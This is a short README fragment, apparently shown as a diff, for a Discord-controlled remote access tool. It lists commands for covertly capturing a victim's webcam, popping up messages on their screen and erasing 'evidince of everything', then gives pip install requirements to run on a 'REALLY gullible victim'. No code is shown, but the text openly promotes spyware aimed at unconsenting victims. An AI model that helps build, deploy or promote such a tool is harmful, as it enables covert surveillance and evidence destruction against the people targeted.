Finevr/V-rns/README.md

 .webcam - take a screenshot of the users webcam .popup<message> make a pop up on the users screen .implode - remove evidince of everything
+Here is the requirements
+(if you have a REALLY gullible victim then) pip install discord.py pip install opencv-python pip install pillow pip install pyautogui pip install pygetwindow pip install pycaw pip install numpy